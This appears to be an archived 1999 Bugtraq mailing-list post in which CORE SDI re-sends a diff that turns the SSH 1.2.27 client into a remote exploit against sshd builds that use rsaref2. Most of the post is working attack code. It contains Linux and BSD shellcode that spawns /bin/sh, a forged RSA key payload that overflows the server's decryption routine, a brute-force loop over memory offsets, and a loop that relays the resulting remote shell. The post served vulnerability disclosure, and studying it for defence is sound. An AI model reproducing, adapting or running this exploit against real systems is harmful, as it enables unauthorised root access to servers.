Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: ssh 1.2.27 exploit
From: core.lists.bugtraq () CORE-SDI COM (IvŠn Arce)
Date: Wed, 15 Dec 1999 16:21:17 -0300


Ben Kram wrote:

Hi - I'm trying to fathom your exploit; your mta put newlines in through the diffs.

I started going through and guessing how to correct the patch, but then it ocurred to me to ask you for it.


sorry about that, i shouldnt trust MUAs that run in in resizeable windows and have guis

heres the diffs as attachment...
-ivan

--
"Understanding. A cerebral secretion that enables one having it to know
 a house from a horse by the roof on the house,
 It's nature and laws have been exhaustively expounded by Locke,
 who rode a house, and Kant, who lived in a horse." - Ambrose Bierce

==================[ CORE Seguridad de la Informacion S.A. ]=========
Iv√°n Arce
Presidente
PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836  B25D 207B E78E 2AD1 F65A
email: iarce () core-sdi com
http://www.core-sdi.com
Pte. Juan D. Peron 315 Piso 4 UF 17
1038 Capital Federal
Buenos Aires, Argentina.              Tel/Fax : +(54-11) 4331-5402
Casilla de Correos 877 (1000) Correo Central
=====================================================================



diff -N -c ssh-1.2.27/README.coresdi ssh-1.2.27-exploit/README.coresdi
*** ssh-1.2.27/README.coresdi   Wed Dec 31 21:00:00 1969
--- ssh-1.2.27-exploit/README.coresdi   Tue Dec 14 19:21:10 1999
***************
*** 0 ****
--- 1,32 ----
+ /*
+  *
+  * Descrition: Exploit code for SSH-1.2.27 sshd with rsaref2 compiled in
+  * (--with-rsaref)
+  *
+  * Author: Alberto Solino <Alberto_Solino () core-sdi com>
+  *
+  * Copyright (c) 1999 CORE SDI S.A., Buenos Aires, Argentina.
+  * All rights reserved.
+  *
+  *
+  * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES
+  * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY DIRECT,
+  * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES RESULTING
+  * FROM THE USE OR MISUSE OF THIS SOFTWARE.
+  *
+  */
+
+ Tested on
+   SSH-1.2.27 Linux RedHat 6.0
+   SSh-1.2.27 OpenBSD 2.6
+
+ Details
+   Relies on offsets taken from JUMP_TO_MY_KEY that are different on
+   different boxes.
+   If it doesnt work, check inside incoming.buf for the string "BETO"
+   and find the proper offsets from there.
+   Additionally, the -f nad -t options are available, to  provide
+   a range of addresses and try to brute force remotely the right
+   one.
+   Specify the target os type with -o
+
Binary files ssh-1.2.27/exploit_key and ssh-1.2.27-exploit/exploit_key differ
diff -N -c ssh-1.2.27/exploit_key.pub ssh-1.2.27-exploit/exploit_key.pub
*** ssh-1.2.27/exploit_key.pub  Wed Dec 31 21:00:00 1969
--- ssh-1.2.27-exploit/exploit_key.pub  Tue Nov 30 01:14:10 1999
***************
*** 0 ****
--- 1 ----
+ 1024 35 
126711790959034717449904354103174105464423905750911738400315407900752946071988773532672356922306687685191424606806952947660867911760697942514594956213990584856991678398353026692681430136274853402829183803383791361598788187120276305630837366787507026341329913385926890796258293060370046555624537870005279144741
 root () jack
Common subdirectories: ssh-1.2.27/gmp-2.0.2-ssh-2 and ssh-1.2.27-exploit/gmp-2.0.2-ssh-2
diff -N -c ssh-1.2.27/history ssh-1.2.27-exploit/history
*** ssh-1.2.27/history  Wed Dec 31 21:00:00 1969
--- ssh-1.2.27-exploit/history  Tue Nov 16 21:41:36 1999
***************
*** 0 ****
--- 1,7 ----
+ Tue Nov 16 19:58:04 ART 1999
+ En RSAPrivateBlock, no calcula la longitud de salida del buffer, simplemente copia
+ el tamanio del modulo que esta en privatekey, pero la longitud de los numeros
+ nunca es mayor que 128.
+ Tue Nov 16 21:41:15 ART 1999
+ overflow en RSAPrivateDecrypt????!?!?!??!?!?! who knows!! fijarse...
+
Common subdirectories: ssh-1.2.27/rsaref2 and ssh-1.2.27-exploit/rsaref2
diff -N -c ssh-1.2.27/ssh.c ssh-1.2.27-exploit/ssh.c
*** ssh-1.2.27/ssh.c    Wed May 12 08:19:28 1999
--- ssh-1.2.27-exploit/ssh.c    Tue Dec 14 19:03:59 1999
***************
*** 202,208 ****
  #include "readconf.h"
  #include "userfile.h"
  #include "emulate.h"
-
  #ifdef LIBWRAP
  #include <tcpd.h>
  #include <syslog.h>
--- 202,207 ----
***************
*** 212,217 ****
--- 211,249 ----
  int allow_severity = LOG_INFO;
  int deny_severity = LOG_WARNING;
  #endif /* LIBWRAP */
+ #ifdef SSH_EXPLOIT
+ #define BETO_STR 0x80850f8
+ unsigned long exp_offset=BETO_STR;
+ unsigned long exp_offset_to=BETO_STR;
+ unsigned char *shell_code;
+ unsigned long shell_code_len=0;
+ unsigned char linux_shell_code[]=
+ {0x90    ,0x90    ,0x90    ,0x90    ,0x90    ,0x90    ,0x90    ,0x90
+ ,0xeb    ,0x44    ,0x5e    ,0x89    ,0x76
+ ,0x08    ,0x31    ,0xc0    ,0x88    ,0x46    ,0x07    ,0x89    ,0x46
+ ,0x0c    ,0x56    ,0xb9    ,0x00    ,0x00    ,0x00    ,0x00    ,0xbb
+ ,0x05    ,0x00    ,0x00    ,0x00    ,0xb0    ,0x3f    ,0xcd    ,0x80
+ ,0xb9    ,0x01    ,0x00    ,0x00    ,0x00    ,0xbb    ,0x05    ,0x00
+ ,0x00    ,0x00    ,0xb0    ,0x3f    ,0xcd    ,0x80    ,0xb9    ,0x02
+ ,0x00    ,0x00    ,0x00    ,0xbb    ,0x05    ,0x00    ,0x00    ,0x00
+ ,0xb0    ,0x3f    ,0xcd    ,0x80    ,0x5e    ,0xb0    ,0x0b    ,0x89
+ ,0xf3    ,0x8d    ,0x4e    ,0x08    ,0x8d    ,0x56    ,0x0c    ,0xcd
+ ,0x80    ,0xe8    ,0xb7    ,0xff    ,0xff    ,0xff    ,0x2f    ,0x62
+ ,0x69    ,0x6e    ,0x2f    ,0x73    ,0x68    ,0x00};
+ unsigned char bsd_shell_code[]=
+ {0x90,    0x90,    0x90,    0x90,    0x90,    0x90,    0x90,
+  0xeb,    0x45,    0x5e,    0x89,    0x76,    0x08,    0x31,    0xc0,
+  0x88,    0x46,    0x07,    0x89,    0x46,    0x0c,    0x6a,    0x00,
+  0x6a,    0x05,    0x51,    0xb8,    0x5a,    0x00,    0x00,    0x00,
+  0xcd,    0x80,    0x6a,    0x01,    0x6a,    0x05,    0x51,    0xb8,
+  0x5a,    0x00,    0x00,    0x00,    0xcd,    0x80,    0x6a,    0x02,
+  0x6a,    0x05,    0x51,    0xb8,    0x5a,    0x00,    0x00,    0x00,
+  0xcd,    0x80,    0x6a,    0x00,    0x8d,    0x46,    0x08,    0x50,
+  0x8b,    0x46,    0x08,    0x50,    0xb8,    0x3b,    0x00,    0x00,
+  0x00,    0x31,    0xc9,    0x41,    0x51,    0xcd,    0x80,    0xe8,
+  0xb6,    0xff,    0xff,    0xff,    0x2f,    0x62,    0x69,    0x6e,
+  0x2f,    0x73,    0x68,      0x00};
+ #endif

  /* Random number generator state.  This is initialized in ssh_login, and
     left initialized.  This is used both by the packet module and by various
***************
*** 275,280 ****
--- 307,322 ----
  /* Prints a help message to the user.  This function never returns. */
  void usage(void)
  {
+ #ifdef SSH_EXPLOIT
+       fprintf(stderr, "ssh/rsaref2 exploit by Core SDI SA (c) 1999\n");
+       fprintf(stderr, "Usage:\n\t%s [-f offset_from] [-t offset_to] -o ostype host\n",av0);
+       fprintf(stderr, "where:\n");
+       fprintf(stderr, "\toffset_from:       start offset for brute force\n");
+       fprintf(stderr, "\toffset_to:         end offset for brute force\n");
+       fprintf(stderr, "\tostype:            remote machine ostype\n");
+       fprintf(stderr, "                     BSD   : for (*BSD)\n");
+       fprintf(stderr, "                     Linux : for Intel Linuxes\n\n");
+ #else
    fprintf(stderr, "Usage: %s [options] host [command]\n", av0);
    fprintf(stderr, "Options:\n");
    fprintf(stderr, "  -l user     Log in using this user name.\n");
***************
*** 321,326 ****
--- 363,369 ----
    fprintf(stderr, "  -C          Enable compression.\n");
    fprintf(stderr, "  -g          Allow remote hosts to connect to local port forwardings\n");
    fprintf(stderr, "  -o 'option' Process the option as if it was read from a configuration file.\n");
+ #endif
    exit(1);
  }

***************
*** 504,510 ****
--- 547,557 ----
        opt = av[optind][1];
        if (!opt)
          usage();
+ #ifdef SSH_EXPLOIT
+       if (strchr("fto", opt)) /* options with arguments */
+ #else
        if (strchr("eilcpLRo", opt)) /* options with arguments */
+ #endif
          {
            optarg = av[optind] + 2;
            if (strcmp(optarg, "") == 0)
***************
*** 522,527 ****
--- 569,594 ----
          }
        switch (opt)
          {
+ #ifdef SSH_EXPLOIT
+                               case 'f':
+                                       exp_offset = strtoul(optarg,NULL,16);
+                                       break;
+                               case 't':
+                                       exp_offset_to = strtoul(optarg,NULL,16);
+                                       break;
+                               case 'o':
+                                       if ( !strcmp(optarg,"BSD") ) {
+                                               shell_code = bsd_shell_code;
+                                               shell_code_len = sizeof(bsd_shell_code);
+                                       }
+                                       else if ( !strcmp(optarg,"Linux") ) {
+                                               shell_code = linux_shell_code;
+                                               shell_code_len = sizeof(linux_shell_code);
+                                       }
+                                       else
+                                               usage();
+                                       break;
+ #else
          case 'n':
            stdin_null_flag = 1;
            break;
***************
*** 681,692 ****
          case 'g':
            options.gateway_ports = 1;
            break;
!
          default:
            usage();
          }
      }
!
   /* Check that we got a host name. */
    if (!host)
      usage();
--- 748,766 ----
          case 'g':
            options.gateway_ports = 1;
            break;
! #endif
          default:
            usage();
          }
      }
! #ifdef SSH_EXPLOIT
!       if ( shell_code == NULL )
!               usage();
!       if ( exp_offset_to < exp_offset ) {
!               fprintf(stderr,"Invalid offsets!\n");
!               usage();
!       }
! #endif
   /* Check that we got a host name. */
    if (!host)
      usage();
***************
*** 793,798 ****
--- 867,876 ----
       rhosts_authentication is true.  Note that the random_state is not
       yet used by this call, although a pointer to it is stored, and thus it
       need not be initialized. */
+ #ifdef SSH_EXPLOIT
+       do      
+       {
+ #endif
    ok = ssh_connect(host, options.port, options.connection_attempts,
                     !use_privileged_port,
                     original_real_uid, options.proxy_command, &random_state);
***************
*** 846,857 ****
                                                    original_real_uid);
    options.user_hostfile = tilde_expand_filename(options.user_hostfile,
                                                  original_real_uid);
!
    /* Log into the remote system.  This never returns if the login fails.
       Note: this initializes the random state, and leaves it initialized. */
    ssh_login(&random_state, host_private_key_loaded, &host_private_key,
              host, &options, original_real_uid);
!
    /* We no longer need the host private key.  Clear it now. */
    if (host_private_key_loaded)
      rsa_clear_private_key(&host_private_key);
--- 924,941 ----
                                                    original_real_uid);
    options.user_hostfile = tilde_expand_filename(options.user_hostfile,
                                                  original_real_uid);
! #ifdef SSH_EXPLOIT
!   fprintf(stdout,"Tryin'... 0x%x\n",exp_offset);
! #endif
    /* Log into the remote system.  This never returns if the login fails.
       Note: this initializes the random state, and leaves it initialized. */
    ssh_login(&random_state, host_private_key_loaded, &host_private_key,
              host, &options, original_real_uid);
! #ifdef SSH_EXPLOIT
!       exp_offset++;
!       } while (exp_offset<=exp_offset_to);
!       fprintf(stderr,"Didn't work ;( \n");
! #endif
    /* We no longer need the host private key.  Clear it now. */
    if (host_private_key_loaded)
      rsa_clear_private_key(&host_private_key);
diff -N -c ssh-1.2.27/sshconnect.c ssh-1.2.27-exploit/sshconnect.c
*** ssh-1.2.27/sshconnect.c     Wed May 12 08:19:29 1999
--- ssh-1.2.27-exploit/sshconnect.c     Thu Dec  9 17:09:39 1999
***************
*** 214,220 ****
  #include "mpaux.h"
  #include "userfile.h"
  #include "emulate.h"
-
  #ifdef KERBEROS
  #ifdef KRB5
  #include <krb5.h>
--- 214,219 ----
***************
*** 1271,1276 ****
--- 1270,1280 ----
                 const char *orighost,
                 Options *options, uid_t original_real_uid)
  {
+ #ifdef SSH_EXPLOIT
+ extern unsigned long exp_offset;
+ extern unsigned char *shell_code;
+ extern unsigned long shell_code_len;
+ #endif
    int i, type, len, f;
    char buf[1024], seedbuf[16];
    char *password;
***************
*** 1278,1283 ****
--- 1282,1298 ----
    MP_INT key;
    RSAPublicKey host_key;
    RSAPublicKey public_key;
+ #ifdef SSH_EXPLOIT
+   MP_INT fakekey;
+   int retval;
+   unsigned char first;
+   struct sockaddr_in sin;
+   int sin_len=sizeof(struct sockaddr_in);
+   RSAPrivateKey myfakeKey;
+   RSAPrivateKey myPrivateKey;
+   char private_key_filename[]="exploit_key";
+   fd_set rfds;
+ #endif
    unsigned char session_key[SSH_SESSION_KEY_LENGTH];
    const char *server_user, *local_user;
    char *cp, *host;
***************
*** 1501,1506 ****
--- 1516,1522 ----
    /* Generate an encryption key for the session.   The key is a 256 bit
       random number, interpreted as a 32-byte key, with the least significant
       8 bits being the first byte of the key. */
+
    for (i = 0; i < SSH_SESSION_KEY_LENGTH; i++)
      session_key[i] = random_get_byte(state);

***************
*** 1519,1532 ****
        else
          mpz_add_ui(&key, &key, session_key[i]);
      }
!
    /* Encrypt the integer using the public key and host key of the server
       (key with smaller modulus first). */
    if (mpz_cmp(&public_key.n, &host_key.n) < 0)
      {
        /* Public key has smaller modulus. */
        assert(host_key.bits >= public_key.bits + SSH_KEY_BITS_RESERVED);
-
        rsa_public_encrypt(&key, &key, &public_key, state);
        rsa_public_encrypt(&key, &key, &host_key, state);
      }
--- 1535,1552 ----
        else
          mpz_add_ui(&key, &key, session_key[i]);
      }
! #ifdef SSH_EXPLOIT
!       if ( load_private_key(getuid(),private_key_filename,"",&myPrivateKey,NULL)==0) {
!               fprintf(stderr,"Cannot locate private key %s\n",private_key_filename);
!               exit(1);
!   }
! #endif
    /* Encrypt the integer using the public key and host key of the server
       (key with smaller modulus first). */
    if (mpz_cmp(&public_key.n, &host_key.n) < 0)
      {
        /* Public key has smaller modulus. */
        assert(host_key.bits >= public_key.bits + SSH_KEY_BITS_RESERVED);
        rsa_public_encrypt(&key, &key, &public_key, state);
        rsa_public_encrypt(&key, &key, &host_key, state);
      }
***************
*** 1534,1540 ****
      {
        /* Host key has smaller modulus (or they are equal). */
        assert(public_key.bits >= host_key.bits + SSH_KEY_BITS_RESERVED);
-
        rsa_public_encrypt(&key, &key, &host_key, state);
        rsa_public_encrypt(&key, &key, &public_key, state);
      }
--- 1554,1559 ----
***************
*** 1564,1569 ****
--- 1583,1637 ----
    for (i = 0; i < 8; i++)
      packet_put_char(check_bytes[i]);

+ #ifdef SSH_EXPLOIT
+       for ( i = 0 ; i < 16; i++ ) {
+               mpz_mul_2exp(&key, &key, 8);
+               mpz_add_ui(&key, &key, i+1);
+       }
+       /* Aca seto el lugar donde va a estar la clave nueva cambiada*/
+       for ( i = 0; i < 4 ; i++ ) {
+               mpz_mul_2exp(&key,&key,8);
+               mpz_add_ui(&key,&key, ((exp_offset+9) >> (i*8) & 0xff));
+       }
+
+       /* Con esto fuerzo a que el ciphertext sea mas chico que el modulo*/
+       key._mp_d[31]=0;
+       key._mp_d[32]=0;
+       key._mp_d[3]=htonl(exp_offset+0x5b);
+       /* Ret address a mi codigo */
+       //key._mp_d[3]=0x51510808; // JUMP_TO_MY_KEY+87 dado vuelta
+       /*
+       No se porque mierda ahora hay que invertilo...
+       key._mp_d[3]=JUMP_TO_MY_KEY+80;
+       */
+
+       myfakeKey.bits = 1182; /* Tamanio de la clave */
+       myfakeKey.n._mp_alloc = 33;
+       myfakeKey.n._mp_size = 32;
+       myfakeKey.n._mp_d = (unsigned long int *)(exp_offset+184);
+
+       myfakeKey.e._mp_alloc = 1;
+       myfakeKey.e._mp_size = 1;
+       myfakeKey.e._mp_d = (unsigned long int *)(exp_offset+316);
+
+       myfakeKey.d._mp_alloc = 1;
+       myfakeKey.d._mp_size = 1;
+       myfakeKey.d._mp_d = (unsigned long int *)(exp_offset+25);
+
+       myfakeKey.u._mp_alloc = 17;
+       myfakeKey.u._mp_size = 16;
+       myfakeKey.u._mp_d = (unsigned long int *)(exp_offset+460);
+
+       myfakeKey.p._mp_alloc = 17;
+       myfakeKey.p._mp_size = 16;
+       myfakeKey.p._mp_d = (unsigned long int *)(exp_offset+392);
+
+       myfakeKey.q._mp_alloc = 17;
+       myfakeKey.q._mp_size = 16;
+       myfakeKey.q._mp_d = (unsigned long int *)(exp_offset+324);
+
+ #endif
+
    /* Send the encrypted encryption key. */
    packet_put_mp_int(&key);

***************
*** 1571,1579 ****
--- 1639,1686 ----
    packet_put_int(SSH_PROTOFLAG_SCREEN_NUMBER | SSH_PROTOFLAG_HOST_IN_FWD_OPEN);

    /* Send the packet now. */
+ #ifdef SSH_EXPLOIT
+   packet_put_string("BETO",4);
+   packet_put_string((char *)&myfakeKey,sizeof(myfakeKey));
+   packet_put_string(shell_code, shell_code_len);
+   packet_put_string((char *)myPrivateKey.n._mp_d,myPrivateKey.n._mp_size*4);
+   packet_put_string((char *)myPrivateKey.e._mp_d,myPrivateKey.e._mp_size*4);
+   packet_put_string((char *)myPrivateKey.q._mp_d,myPrivateKey.q._mp_size*4);
+   packet_put_string((char *)myPrivateKey.p._mp_d,myPrivateKey.p._mp_size*4);
+   packet_put_string((char *)myPrivateKey.u._mp_d,myPrivateKey.u._mp_size*4);
+ #endif
    packet_send();
    packet_write_wait();
+ #ifdef SSH_EXPLOIT

+       usleep(10);
+       first = 1;
+       i = write(packet_get_connection_in(),"id\n",3);
+       if ( getpeername(packet_get_connection_in(),(struct sockaddr *)&sin, &sin_len) == -1)
+               return;
+               
+       while (1) {
+       FD_ZERO(&rfds);
+               FD_SET(packet_get_connection_in(),&rfds);
+               FD_SET(STDIN_FILENO,&rfds);
+               if ( (retval = select(packet_get_connection_in()+1,&rfds,NULL,NULL,NULL)) < 0 )
+                       return;
+               if (FD_ISSET(STDIN_FILENO,&rfds)) {
+                       i=read(STDIN_FILENO,buf,sizeof(buf));
+                       write(packet_get_connection_out(),buf,i);
+               } else if (FD_ISSET(packet_get_connection_in(),&rfds)) {
+                       i=read(packet_get_connection_in(),buf,sizeof(buf));
+                       if ( first )
+                               if ( strncmp(buf,"uid",3) )
+                                       return;
+                               else {
+                                       fprintf(stdout,"Got it!\n");
+                                       first = 0;
+                               }
+                       write(STDOUT_FILENO,buf,i);
+               }
+       }       
+ #endif
    /* Destroy the session key integer and the public keys since we no longer
       need them. */
    mpz_clear(&key);
***************
*** 1583,1588 ****
--- 1690,1697 ----
    debug("Sent encrypted session key.");

    /* Set the encryption key. */
+   packet_set_encryption_key(session_key, SSH_SESSION_KEY_LENGTH+120,
+                             options->cipher, 1);
    packet_set_encryption_key(session_key, SSH_SESSION_KEY_LENGTH,
                              options->cipher, 1);

Common subdirectories: ssh-1.2.27/zlib-1.0.4 and ssh-1.2.27-exploit/zlib-1.0.4

--- For a personal reply use iarce () core-sdi com


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]